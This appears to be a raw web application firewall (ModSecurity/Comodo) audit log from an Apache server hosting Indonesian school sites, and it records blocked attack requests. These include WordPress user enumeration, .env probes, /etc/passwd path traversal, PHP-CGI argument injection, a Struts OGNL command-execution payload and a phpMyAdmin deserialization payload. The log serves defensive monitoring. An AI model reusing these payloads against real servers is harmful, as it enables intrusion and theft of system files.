Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73aa2d60-Z-- --96c1cb56-A-- [23/May/2025:01:31:20 +0700] aC9teCektx75wRFPQygHSwAAAMA 103.236.140.4 33152 103.236.140.4 8181 --96c1cb56-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.220.113.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.220.113.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --96c1cb56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --96c1cb56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747938680445437 2934 (- - -) Stopwatch2: 1747938680445437 2934; combined=1272, p1=444, p2=798, p3=0, p4=0, p5=30, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96c1cb56-Z-- --c53d0d1b-A-- [23/May/2025:01:42:33 +0700] aC9wGSektx75wRFPQygHVAAAANg 103.236.140.4 33258 103.236.140.4 8181 --c53d0d1b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: AdsBot-Google ( http://www.google.com/adsbot.html) Accept-Charset: utf-8 --c53d0d1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c53d0d1b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747939353062271 847 (- - -) Stopwatch2: 1747939353062271 847; combined=338, p1=295, p2=0, p3=0, p4=0, p5=43, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c53d0d1b-Z-- --abe19e76-A-- [23/May/2025:01:59:33 +0700] aC90FSektx75wRFPQygHXgAAAM4 103.236.140.4 33392 103.236.140.4 8181 --abe19e76-B-- POST /userentry?accountId=/../../../tomcat/webapps/ZpoYt/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 124 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: X-Varnish: 166344505 --abe19e76-C-- xœ ðffábœŠ¼ð"AQN „…dœÃ\u ŒŒuMÌLÌôJ*JBC8˜Û§žcóK-­àf`dùÊÈÀÀ2¨:>Ä58„+À›‘IŽ—±`q &†-Pm–°B,A³ À›• ¢—‘!H‡‚M ?Ë --abe19e76-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --abe19e76-E-- --abe19e76-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS_NAMES:x\x9c\v\xf0ff\xe1b\x00\x81\x9c\x8a\xbc\xf0"AQ\x0fN \x1b\x84\x85\x18d\x18\x9c\xc3\\u\x8d\x0c\x8c\x8cuM\xcc\x8dL\xcc\xf4J*JBC8\x19\x98\x1f\xdb\x05\xa7\x9ec\xf3K-\xad\xe0f`d\xf9\xca\xc8\xc0\xc0\x022\x01\xa8:>\xc458\x84 \xc0\x9b\x91I\x8e\x19\x97\xb1\x12`q\xa0 outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS_NAMES:x\x5cx9c\x5cv\x5cxf0ff\x5cxe1b\x5cx00\x5cx81\x5cx9c\x5cx8a\x5cxbc\x5cxf0\x22AQ\x5cx0fN \x5cx1b\x5cx84\x5cx85\x5cx18d\x5cx18\x5cx9c\x5cxc3\x5c\x5cu\x5cx8d\x5cx0c\x5cx8c\x5cx8cuM\x5cxcc\x5cx8dL\x5cxcc\x5cxf4J*JBC8\x5cx19\x5cx98\x5cx1f\x5cxdb\x5cx05\x5cxa7\x5cx9ec\x5cxf3K-\x5cxad\x5cxe0f`d\x5cxf9\x5cxca\x5cxc8\x5cxc0\x5cxc0\x5cx022\x5cx01\x5cxa8:>\x5cxc458\x5cx84 \x5cxc0\x5cx9b\x5cx91I\x5cx8e\x5cx19\x5cx97\x5cxb1\x5cx12`q\x5cxa0=x\x9c\x0b\xf0ff\xe1b\x00\x81\x9c Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747940373251607 3297 (- - -) Stopwatch2: 1747940373251607 3297; combined=2210, p1=363, p2=1820, p3=0, p4=0, p5=27, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abe19e76-Z-- --894b9d54-A-- [23/May/2025:02:10:04 +0700] aC92jGfriXjg62qQwE9s8AAAAIk 103.236.140.4 33464 103.236.140.4 8181 --894b9d54-B-- GET /?umbrella-restore=1&filename=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 163523943 --894b9d54-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --894b9d54-E-- --894b9d54-H-- Message: Access denied with code 403 (phase 2). 
Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?umbrella-restore=1&filename=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747941004128692 1800 (- - -) Stopwatch2: 1747941004128692 1800; combined=495, p1=339, p2=126, p3=0, p4=0, p5=29, sr=68, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --894b9d54-Z-- --9751311f-A-- [23/May/2025:02:14:31 +0700] aC93l30O04WKE1HJ5iR7sgAAAAs 103.236.140.4 33488 103.236.140.4 8181 --9751311f-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --9751311f-C-- --9751311f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9751311f-E-- --9751311f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747941271392472 4015 (- - -) Stopwatch2: 1747941271392472 4015; combined=2280, p1=488, p2=1759, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9751311f-Z-- --9c548914-A-- [23/May/2025:02:31:35 +0700] aC97lyektx75wRFPQygHbAAAAMg 103.236.140.4 33594 103.236.140.4 8181 --9c548914-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.102.239.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.102.239.204 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9c548914-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c548914-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747942295167211 2913 (- - -) Stopwatch2: 1747942295167211 2913; combined=1257, p1=436, p2=791, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c548914-Z-- --3ea89e6e-A-- [23/May/2025:02:39:53 +0700] aC99iSektx75wRFPQygHdgAAANM 103.236.140.4 33644 103.236.140.4 8181 --3ea89e6e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 183.88.240.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 183.88.240.63 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3ea89e6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ea89e6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747942793839484 2846 (- - -) Stopwatch2: 1747942793839484 2846; combined=1225, p1=421, p2=773, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ea89e6e-Z-- --463ebc16-A-- [23/May/2025:02:46:59 +0700] aC9_Myektx75wRFPQygHggAAAMQ 103.236.140.4 33748 103.236.140.4 8181 --463ebc16-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 167.99.181.249 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 167.99.181.249 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --463ebc16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --463ebc16-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747943219477720 849 (- - -) Stopwatch2: 1747943219477720 849; combined=316, p1=282, p2=0, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --463ebc16-Z-- --ffb4a859-A-- [23/May/2025:02:51:10 +0700] aC-ALuThJmFSRJ5-OZfqVQAAAE4 103.236.140.4 33796 103.236.140.4 8181 --ffb4a859-B-- POST /login.action HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 596 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 166344619 --ffb4a859-C-- username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D --ffb4a859-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ffb4a859-E-- --ffb4a859-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /login.action"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747943470027522 2831 (- - -) Stopwatch2: 1747943470027522 2831; combined=589, p1=408, p2=154, p3=0, p4=0, p5=26, sr=69, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ffb4a859-Z-- --b8dfff2c-A-- [23/May/2025:02:51:10 +0700] aC-ALiektx75wRFPQygHjAAAAMU 103.236.140.4 33814 103.236.140.4 8181 --b8dfff2c-B-- POST /scripts/setup.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 80 User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: */* Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 166635402 --b8dfff2c-C-- action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} --b8dfff2c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8dfff2c-E-- --b8dfff2c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /scripts/setup.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747943470855916 1759 (- - -) Stopwatch2: 1747943470855916 1759; combined=545, p1=396, p2=122, p3=0, p4=0, p5=27, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8dfff2c-Z-- --e252816d-A-- [23/May/2025:03:04:18 +0700] aC-DQn0O04WKE1HJ5iR7zQAAAAo 103.236.140.4 33876 103.236.140.4 8181 --e252816d-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --e252816d-C-- --e252816d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e252816d-E-- --e252816d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747944258330438 3913 (- - -) Stopwatch2: 1747944258330438 3913; combined=2165, p1=502, p2=1628, p3=0, p4=0, p5=35, sr=83, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e252816d-Z-- --43ab087d-A-- [23/May/2025:03:10:27 +0700] aC-Esyektx75wRFPQygHkAAAANM 103.236.140.4 33958 103.236.140.4 8181 --43ab087d-B-- POST /uapjs/jsinvoke/?action=invoke HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 232 User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 166635444 --43ab087d-C-- {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig", "parameterTypes":["java.lang.Object","java.lang.String"], "parameters":["2xQufSTMaLU89DHV7ltwT0oEEdB","webapps/nc_web/2xQufVuSBmIOFfRHwv6uZZxNqPA.jsp"]} --43ab087d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 
Connection: close Content-Type: text/html; charset=iso-8859-1 --43ab087d-E-- --43ab087d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(\\n|\\r)" at ARGS_NAMES:{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig",\r\n"parameterTypes":["java.lang.Object","java.lang.String"],\r\n"parameters":["2xQufSTMaLU89DHV7ltwT0oEEdB","webapps/nc_web/2xQufVuSBmIOFfRHwv6uZZxNqPA.jsp"]}. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "145"] [id "217291"] [rev "2"] [msg "HTTP Header Injection Attack via payload (CR/LF detected)||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: \x0d found within ARGS_NAMES:{\x22serviceName\x22:\x22nc.itf.iufo.IBaseSPService\x22,\x22methodName\x22:\x22saveXStreamConfig\x22,\x5cr\x5cn\x22parameterTypes\x22:[\x22java.lang.Object\x22,\x22java.lang.String\x22],\x5cr\x5cn\x22parameters\x22:[\x222xQufSTMaLU89DHV7ltwT0oEEdB\x22,\x22webapps/nc_web/2xQufVuSBmIOFfRHwv6uZZxNqPA.jsp\x22]}: {\x22serviceName\x22:\x22nc.itf.iufo.IBaseSPService\x22,\x22methodName\x22:\x22saveXStreamConfig\x22,\x0d\x0a\x22parameterTypes\x22: Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747944627292578 4682 (- - -) Stopwatch2: 1747944627292578 4682; combined=2711, p1=506, p2=2173, p3=0, p4=0, p5=32, sr=84, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43ab087d-Z-- --4533a62d-A-- [23/May/2025:03:11:40 +0700] aC-E_GfriXjg62qQwE9tJQAAAIQ 103.236.140.4 33984 103.236.140.4 8181 --4533a62d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 97.74.83.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 97.74.83.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4533a62d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4533a62d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747944700105805 3693 (- - -) Stopwatch2: 1747944700105805 3693; combined=1756, p1=838, p2=885, p3=0, p4=0, p5=32, sr=386, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4533a62d-Z-- --a677233f-A-- [23/May/2025:03:17:07 +0700] aC-GQ2friXjg62qQwE9tOAAAAIk 103.236.140.4 34066 103.236.140.4 8181 --a677233f-B-- GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Kubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 166344685 --a677233f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a677233f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747945027143341 2158 (- - -) Stopwatch2: 1747945027143341 2158; combined=747, p1=355, p2=365, p3=0, p4=0, p5=27, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
